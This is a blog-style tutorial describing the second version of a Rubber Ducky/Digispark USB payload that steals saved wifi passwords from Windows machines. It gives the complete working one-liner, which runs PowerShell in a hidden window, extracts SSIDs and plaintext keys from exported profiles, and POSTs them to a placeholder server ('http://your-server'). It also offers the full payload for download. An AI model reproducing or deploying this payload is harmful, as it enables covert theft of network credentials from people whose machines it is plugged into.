4 min read
May 20, 2019

Rubber Ducky: Wifi Password Exfil via POST V2

The first version of my Rubber Ducky script to exfil wifi passwords via POST dumped each wifi profile as a XML file then sent the desired fields as a POST request. This works pretty well but with separate POST requests for each wifi profile I found myself skipping past unnecessary data server-side so I thought 'why not send everything in one nicely formatted POST request?'

TL;DR: Grab the new script here. Beginner-friendly breakdown of my process below:

In order to achieve this, the idea was to reuse the part of the V1 script that dumped each wifi profile to a XML file, parse each XML file, write the desired fields to a new file then send the contents of that new file in one POST request. This was easier said than done as you will see.

I started off with the XML files in c:\l as that was the first part of the script then started building the Powershell command: Get-ChildItem -name -Include *.xml > list.txt; Get-Content list.txt | ForEach-Object { [xml]$xmlDoc = Get-Content $_;  - this part is reused from V1. It writes the name of each XML file to list.txt then starts a FOR loop which sets the xmlDoc variable to each XML file. We start building the rest of the loop below:

write-output "SSID: $($xmlDoc.WLANProfile.SSIDConfig.SSID.Name)" >>wifi.txt - This uses the write-output command to write "SSID: " followed by the SSID field I covered in the V1 tutorial. Like Linux, enclosing a command in $(<command>) will give the output of said command.

Using the same syntax for the other fields, the final command is as follows:

write-output "SSID: $($xmlDoc.WLANProfile.SSIDConfig.SSID.Name)" >>wifi.txt;write-output "Password: $($xmlDoc.WLANProfile.MSM.security.sharedkey.keyMaterial)">>wifi.txt;write-output "Authentication: $($xmlDoc.WLANProfile.MSM.security.authencryption.authentication)">>wifi.txt;write-output "Encryption: $($xmlDoc.WLANProfile.MSM.security.authencryption.encryption)">>wifi.txt;write-output "-------">>wifi.txt

Now everything is nicely formatted with a line of hyphens to separate each wifi network:

Then I tried to use the invoke-webrequest to send the contents of wifi.txt but got an unpleasant surprise:

The HTTP server was not happy with me either:

After a lot of googling and experimentation, I figured out the solution to the problem. Neither Powershell or the HTTP server liked the encoding of the text file so I ended up using the out-file command with an 'encoding' flag to rewrite the wifi.txt file with ascii encoding to 'wifi-enc.txt' with the command get-content wifi.txt |out-file -encoding ascii wifi-enc.txt. After this,  sending 'wifi-enc.txt' as a POST command worked without a problem:

Server side:

Sweet! I thought I was in the home stretch here and just needed to finish the loop. I did so and everything looked great until I flashed the script to the Digispark and found that my formatting had been lost:

Can you spot the problem below?

cmd /c start powershell -nop -win hid -c "Get-ChildItem -name -Include *.xml >list.txt;Get-Content list.txt|ForEach-Object { [xml]$xmlDoc = Get-Content $_;write-output "SSID: $($xmlDoc.WLANProfile.SSIDConfig.SSID.Name)" >>wifi.txt;write-output "Password: $($xmlDoc.WLANProfile.MSM.security.sharedkey.keyMaterial)">>wifi.txt;write-output "Authentication: $($xmlDoc.WLANProfile.MSM.security.authencryption.authentication)">>wifi.txt;write-output "Encryption: $($xmlDoc.WLANProfile.MSM.security.authencryption.encryption)">>wifi.txt;write-output "-------">>wifi.txt};get-content wifi.txt |out-file -encoding ascii wifi-enc.txt;invoke-webrequest http://your-server -method post -infile wifi-enc.txt

It's the quotation marks. The cmd shell is used to run powershell with the command in double-quotes ( cmd /c powershell -c "<command>")  but I used double-quotes to specify what I wanted written to wifi.txt. Okay, should be easy enough to escape the quotes right? A quick google search said to use a backtick ` to escape the quotes. That didn't work and the formatting was still gone as above. After looking around for quite a while, I finally found this post that suggested using 4 double-quotes instead. That solved the problem so the final command was:

cmd /c start powershell -nop -win hid -c "Get-ChildItem -name -Include *.xml >list.txt;Get-Content list.txt|ForEach-Object { [xml]$xmlDoc = Get-Content $_;write-output """"SSID: $($xmlDoc.WLANProfile.SSIDConfig.SSID.Name)"""" >>wifi.txt;write-output """"Password: $($xmlDoc.WLANProfile.MSM.security.sharedkey.keyMaterial)"""">>wifi.txt;write-output """"Authentication: $($xmlDoc.WLANProfile.MSM.security.authencryption.authentication)"""">>wifi.txt;write-output """"Encryption: $($xmlDoc.WLANProfile.MSM.security.authencryption.encryption)"""">>wifi.txt;write-output """"-------"""">>wifi.txt};get-content wifi.txt |out-file -encoding ascii wifi-enc.txt;invoke-webrequest http://your-server -method post -infile wifi-enc.txt

The full Rubber Ducky payload can be downloaded here.